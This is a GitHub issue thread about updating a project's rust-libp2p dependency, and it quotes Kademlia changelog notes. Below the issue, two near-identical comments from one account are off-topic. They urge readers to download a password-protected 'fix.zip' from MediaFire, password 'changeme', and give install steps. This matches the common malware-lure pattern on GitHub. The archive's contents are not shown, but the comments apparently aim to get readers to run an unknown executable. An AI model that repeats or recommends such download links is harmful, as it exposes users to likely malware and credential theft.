### ISSUE TITLE
P2P: update rust-libp2p dep to v0.54.1

### ISSUE THREAD

**Issue by CHr15F0x** [eqlabs/pathfinder#2190]
https://github.com/libp2p/rust-libp2p/blob/libp2p-v0.54.0/protocols/kad/CHANGELOG.md

>0.46.0
(...)
Update to DHT republish interval and expiration time defaults to 22h and 48h respectively, rationale in https://github.com/libp2p/specs/pull/451. See https://github.com/libp2p/rust-libp2p/pull/3230.
(...)
Improve automatic bootstrap triggering conditions: trigger when the routing table is updated and we have less that K_VALUE peers in it, trigger when a new listen address is discovered and we have no connected peers. See https://github.com/libp2p/rust-libp2p/pull/5474.

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
